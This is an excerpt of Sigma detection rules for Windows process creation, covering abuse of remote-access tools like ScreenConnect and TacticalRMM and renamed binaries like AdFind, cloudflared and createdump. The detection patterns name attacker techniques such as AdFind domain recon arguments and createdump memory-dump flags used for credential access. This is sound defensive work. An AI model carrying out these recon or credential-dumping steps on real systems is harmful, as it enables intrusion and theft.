    "content": "title: Remote Access Tool - ScreenConnect Installation Execution\nid: 75bfe6e6-cd8e-429e-91d3-03921e1d7962\nstatus: test\ndescription: Detects ScreenConnect program starts that establish a remote access to a system.\nreferences:\n    - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-11\nmodified: 2024-02-26\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'e=Access&'\n            - 'y=Guest&'\n            - '&p='\n            - '&c='\n            - '&k='\n    condition: selection\nfalsepositives:\n    - Legitimate use by administrative staff\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml",
    "content": "title: Remote Access Tool - ScreenConnect Remote Command Execution\nid: b1f73849-6329-4069-bc8f-78a604bb8b23\nstatus: test\ndescription: Detects the execution of a system command via the ScreenConnect RMM service.\nreferences:\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\nmodified: 2024-02-26\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\ScreenConnect.ClientService.exe'\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        # Example:\n        #   CommandLine: \"cmd.exe\" /c \"C:\\Windows\\TEMP\\ScreenConnect\\23.6.8.8644\\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd\"\n        CommandLine|contains: '\\TEMP\\ScreenConnect\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.\n# Note: Increase the level if you don't leverage ScreenConnect\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml",
    "content": "title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution\nid: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5\nrelated:\n    - id: d1a401ab-8c47-4e86-a7d8-2460b6a53e4a\n      type: derived\nstatus: test\ndescription: |\n    Detects potentially suspicious child processes launched via the ScreenConnect client service.\nreferences:\n    - https://www.mandiant.com/resources/telegram-malware-iranian-espionage\n    - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\n    - https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale\ndate: 2022-02-25\nmodified: 2024-02-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentCommandLine|contains|all:\n            - ':\\Windows\\TEMP\\ScreenConnect\\'\n            - 'run.cmd'\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\curl.exe'\n            - '\\dllhost.exe'\n            - '\\net.exe'\n            - '\\nltest.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\rundll32.exe'\n            - '\\wevtutil.exe'\n    condition: selection\nfalsepositives:\n    - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml",
    "content": "title: Remote Access Tool - ScreenConnect Server Web Shell Execution\nid: b19146a3-25d4-41b4-928b-1e2a92641b1b\nstatus: test\ndescription: Detects potential web shell execution from the ScreenConnect server process.\nreferences:\n    - https://blackpointcyber.com/resources/blog/breaking-through-the-screen/\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\nauthor: Jason Rathbun (Blackpoint Cyber)\ndate: 2024-02-26\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\ScreenConnect.Service.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml",
    "content": "title: Remote Access Tool - Simple Help Execution\nid: 95e60a2b-4705-444b-b7da-ba0ea81a3ee2\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\JWrapper-Remote Access\\'\n            - '\\JWrapper-Remote Support\\'\n        Image|endswith: '\\SimpleService.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli.yml",
    "content": "title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server\nid: 2db93a3f-3249-4f73-9e68-0e77a0f8ae7e\nstatus: experimental\ndescription: |\n    Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.\n    These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.\n    This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.\nreferences:\n    - https://github.com/amidaware/tacticalrmm\n    - https://apophis133.medium.com/powershell-script-tactical-rmm-installation-45afb639eff3\nauthor: Ahmed Nosir (@egycondor)\ndate: 2025-05-29\ntags:\n    - attack.command-and-control\n    - attack.t1219\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains: '\\TacticalAgent\\tacticalrmm.exe'\n        CommandLine|contains|all:\n            - '--api'\n            - '--auth'\n            - '--client-id'\n            - '--site-id'\n            - '--agent-type'\n    condition: selection\nfalsepositives:\n    - Legitimate system administrator deploying TacticalRMM\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml",
    "content": "title: Remote Access Tool - Team Viewer Session Started On Windows Host\nid: ab70c354-d9ac-4e11-bbb6-ec8e3b153357\nrelated:\n    - id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d\n      type: similar\n    - id: f459ccb4-9805-41ea-b5b2-55e279e2424a\n      type: similar\nstatus: test\ndescription: |\n    Detects the command line executed when TeamViewer starts a session started by a remote host.\n    Once a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\nreferences:\n    - Internal Research\nauthor: Josh Nickels, Qi Nan\ndate: 2024-03-11\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image: 'TeamViewer_Desktop.exe'\n        ParentImage: 'TeamViewer_Service.exe'\n        CommandLine|endswith: 'TeamViewer_Desktop.exe --IPCport 5939 --Module 1'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of TeamViewer\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_ultraviewer.yml",
    "content": "title: Remote Access Tool - UltraViewer Execution\nid: 88656cec-6c3b-487c-82c0-f73ebb805503\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md\nauthor: frack113\ndate: 2022-09-25\nmodified: 2024-03-14\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product: 'UltraViewer'\n        - Company: 'DucFabulous Co,ltd'\n        - OriginalFileName: 'UltraViewer_Desktop.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml",
    "content": "title: Discovery of a System Time\nid: b243b280-65fe-48df-ba07-6ddea7646427\nstatus: test\ndescription: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2022-06-28\ntags:\n    - attack.discovery\n    - attack.t1124\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_time:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: 'time'\n    selection_w32tm:\n        Image|endswith: '\\w32tm.exe'\n        CommandLine|contains: 'tz'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of the system utilities to discover system time for legitimate reason\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_adfind.yml",
    "content": "title: Renamed AdFind Execution\nid: df55196f-f105-44d3-a675-e9dfb6cc2f2b\nstatus: test\ndescription: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://thedfirreport.com/2020/05/08/adfind-recon/\n    - https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\n    - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n    - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-21\nmodified: 2025-02-26\ntags:\n    - attack.discovery\n    - attack.t1018\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'domainlist'\n            - 'trustdmp'\n            - 'dcmodes'\n            - 'adinfo'\n            - ' dclist '\n            - 'computer_pwdnotreqd'\n            - 'objectcategory='\n            - '-subnets -f'\n            - 'name=\"Domain Admins\"'\n            - '-sc u:'\n            - 'domainncs'\n            - 'dompol'\n            - ' oudmp '\n            - 'subnetdmp'\n            - 'gpodmp'\n            - 'fspdmp'\n            - 'users_noexpire'\n            - 'computers_active'\n            - 'computers_pwdnotreqd'\n    selection_2:\n        Hashes|contains:\n            - 'IMPHASH=BCA5675746D13A1F246E2DA3C2217492'\n            - 'IMPHASH=53E117A96057EAF19C41380D0E87F1C2'\n            - 'IMPHASH=d144de8117df2beceaba2201ad304764'\n            - 'IMPHASH=12ce1c0f3f5837ecc18a3782408fa975'\n            - 'IMPHASH=4fbf3f084fbbb2470b80b2013134df35'\n            - 'IMPHASH=49b639b4acbecc49d72a01f357aa4930'\n            - 'IMPHASH=680dad9e300346e05a85023965867201'\n            - 'IMPHASH=21aa085d54992511b9f115355e468782'\n    selection_3:\n        OriginalFileName: 'AdFind.exe'\n    filter:\n        Image|endswith: '\\AdFind.exe'\n    condition: 1 of selection* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml",
    "content": "title: Renamed AutoHotkey.EXE Execution\nid: 0f16d9cf-0616-45c8-8fad-becc11b5a41c\nstatus: test\ndescription: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields\nreferences:\n    - https://www.autohotkey.com/download/\n    - https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\nauthor: Nasreddine Bencherchali\ndate: 2023-02-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product|contains: 'AutoHotkey'\n        - Description|contains: 'AutoHotkey'\n        - OriginalFileName:\n              - 'AutoHotkey.exe'\n              - 'AutoHotkey.rc'\n    filter:\n        - Image|endswith:\n              - '\\AutoHotkey.exe'\n              - '\\AutoHotkey32.exe'\n              - '\\AutoHotkey32_UIA.exe'\n              - '\\AutoHotkey64.exe'\n              - '\\AutoHotkey64_UIA.exe'\n              - '\\AutoHotkeyA32.exe'\n              - '\\AutoHotkeyA32_UIA.exe'\n              - '\\AutoHotkeyU32.exe'\n              - '\\AutoHotkeyU32_UIA.exe'\n              - '\\AutoHotkeyU64.exe'\n              - '\\AutoHotkeyU64_UIA.exe'\n        - Image|contains: '\\AutoHotkey'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_autoit.yml",
    "content": "title: Renamed AutoIt Execution\nid: f4264e47-f522-4c38-a420-04525d5b880f\nstatus: test\ndescription: |\n    Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.\n    AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.\n    Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.\nreferences:\n    - https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w\n    - https://www.autoitscript.com/site/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-04\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - ' /AutoIt3ExecuteScript'\n            - ' /ErrorStdOut'\n    selection_2:\n        Hashes|contains:\n            - 'IMPHASH=FDC554B3A8683918D731685855683DDF'  # AutoIt v2 - doesn't cover all binaries\n            - 'IMPHASH=CD30A61B60B3D60CECDB034C8C83C290'  # AutoIt v2 - doesn't cover all binaries\n            - 'IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000'  # AutoIt v3 - doesn't cover all binaries\n    selection_3:\n        OriginalFileName:\n            - 'AutoIt3.exe'\n            - 'AutoIt2.exe'\n            - 'AutoIt.exe'\n    filter_main_legit_name:\n        Image|endswith:\n            - '\\AutoIt.exe'\n            - '\\AutoIt2.exe'\n            - '\\AutoIt3_x64.exe'\n            - '\\AutoIt3.exe'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_binary.yml",
    "content": "title: Potential Defense Evasion Via Binary Rename\nid: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142\nrelated:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      type: similar\nstatus: test\ndescription: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.\nreferences:\n    - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html\n    - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process\n    - https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html\nauthor: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)\ndate: 2019-06-15\nmodified: 2025-07-15\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'Cmd.Exe'\n            - 'CONHOST.EXE'\n            - '7z.exe'\n            - '7za.exe'\n            - 'WinRAR.exe'\n            - 'wevtutil.exe'\n            - 'net.exe'\n            - 'net1.exe'\n            - 'netsh.exe'\n            - 'InstallUtil.exe'\n    filter:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\conhost.exe'\n            - '\\7z.exe'\n            - '\\7za.exe'\n            - '\\WinRAR.exe'\n            - '\\wevtutil.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netsh.exe'\n            - '\\InstallUtil.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml",
    "content": "title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries\nid: 0ba1da6d-b6ce-4366-828c-18826c9de23e\nrelated:\n    - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142\n      type: similar\n    - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed Rundll32 Specific\n      type: derived\n    - id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 # Renamed PsExec\n      type: obsolete\n    - id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 # Renamed PowerShell\n      type: obsolete\n    - id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 # Renamed Rundll32\n      type: obsolete\nstatus: test\ndescription: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.\nreferences:\n    - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html\n    - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html\n    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks\n    - https://twitter.com/christophetd/status/1164506034720952320\n    - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\n    - https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke\nauthor: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113\ndate: 2019-06-15\nmodified: 2026-02-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\n    - car.2013-05-009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Execute processes remotely'\n        - Product: 'Sysinternals PsExec'\n        - Description|startswith:\n              - 'Windows PowerShell'\n              - 'pwsh'\n        - OriginalFileName:\n              - 'certutil.exe'\n              - 'cmstp.exe'\n              - 'cscript.exe'\n              - 'IE4UINIT.EXE'\n              - 'finger.exe'\n              - 'mshta.exe'\n              - 'msiexec.exe'\n              - 'msxsl.exe'\n              - 'powershell_ise.exe'\n              - 'powershell.exe'\n              - 'psexec.c'        # old versions of psexec (2016 seen)\n              - 'psexec.exe'\n              - 'psexesvc.exe'\n              - 'pwsh.dll'\n              - 'reg.exe'\n              - 'regsvr32.exe'\n              - 'rundll32.exe'\n              - 'WerMgr'\n              - 'wmic.exe'\n              - 'wscript.exe'\n    filter:\n        Image|endswith:\n            - '\\certutil.exe'\n            - '\\cmstp.exe'\n            - '\\cscript.exe'\n            - '\\ie4uinit.exe'\n            - '\\finger.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\msxsl.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\psexec.exe'\n            - '\\psexec64.exe'\n            - '\\PSEXESVC.exe'\n            - '\\pwsh.exe'\n            - '\\reg.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wermgr.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist\n    - PsExec installed via Windows Store doesn't contain original filename field (False negative)\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_boinc.yml",
    "content": "title: Renamed BOINC Client Execution\nid: 30d07da2-83ab-45d8-ae75-ec7c0edcaffc\nstatus: test\ndescription: Detects the execution of a renamed BOINC binary.\nreferences:\n    - https://boinc.berkeley.edu/\n    - https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\n    - attack.t1553\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'BOINC.exe'\n    filter_main_legit_name:\n        Image|endswith: '\\BOINC.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml",
    "content": "title: Renamed BrowserCore.EXE Execution\nid: 8a4519e8-e64a-40b6-ae85-ba8ad2177559\nstatus: test\ndescription: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)\nreferences:\n    - https://twitter.com/mariuszbit/status/1531631015139102720\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-06-02\nmodified: 2023-02-03\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1528\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: BrowserCore.exe\n    filter_realbrowsercore:\n        Image|endswith: '\\BrowserCore.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml",
    "content": "title: Renamed Cloudflared.EXE Execution\nid: e0c69ebd-b54f-4aed-8ae3-e3467843f3f0\nstatus: test\ndescription: Detects the execution of a renamed \"cloudflared\" binary.\nreferences:\n    - https://github.com/cloudflare/cloudflared/releases\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\n    - https://github.com/cloudflare/cloudflared\n    - https://www.intrinsec.com/akira_ransomware/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-20\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cleanup:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - 'cleanup '\n        CommandLine|contains:\n            - '-config '\n            - '-connector-id '\n    selection_tunnel:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - ' run '\n        CommandLine|contains:\n            - '-config '\n            - '-credentials-contents '\n            - '-credentials-file '\n            - '-token '\n    selection_accountless:\n        CommandLine|contains|all:\n            - '-url'\n            - 'tunnel'\n    selection_hashes:\n        Hashes|contains:\n            - 'SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29'\n            - 'SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8'\n            - 'SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039'\n            - 'SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28'\n            - 'SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7'\n            - 'SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373'\n            - 'SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670'\n            - 'SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a'\n            - 'SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0'\n            - 'SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1'\n            - 'SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2'\n            - 'SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac'\n            - 'SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f'\n            - 'SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d'\n            - 'SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499'\n            - 'SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b'\n            - 'SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f'\n            - 'SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032'\n            - 'SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234'\n            - 'SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f'\n            - 'SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058'\n            - 'SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c'\n            - 'SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f'\n            - 'SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5'\n            - 'SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3'\n            - 'SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4'\n            - 'SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c'\n            - 'SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4'\n            - 'SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f'\n            - 'SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad'\n            - 'SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7'\n            - 'SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75'\n            - 'SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6'\n            - 'SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688'\n            - 'SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f'\n            - 'SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663'\n            - 'SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77'\n            - 'SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078'\n    filter_main_known_names:\n        Image|endswith:\n            - '\\cloudflared.exe'\n            - '\\cloudflared-windows-386.exe'\n            - '\\cloudflared-windows-amd64.exe'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_createdump.yml",
    "content": "title: Renamed CreateDump Utility Execution\nid: 1a1ed54a-2ba4-4221-94d5-01dee560d71e\nrelated:\n    - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48\n      type: similar\nstatus: test\ndescription: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\n    - https://twitter.com/bopin2020/status/1366400799199272960\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-20\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        OriginalFileName: 'FX_VER_INTERNALNAME_STR'\n    selection_cli:\n        - CommandLine|contains|all:\n              - ' -u ' # Short version of '--full'\n              - ' -f ' # Short version of '--name'\n              - '.dmp'\n        - CommandLine|contains|all:\n              - ' --full ' # Short version of '--full'\n              - ' --name 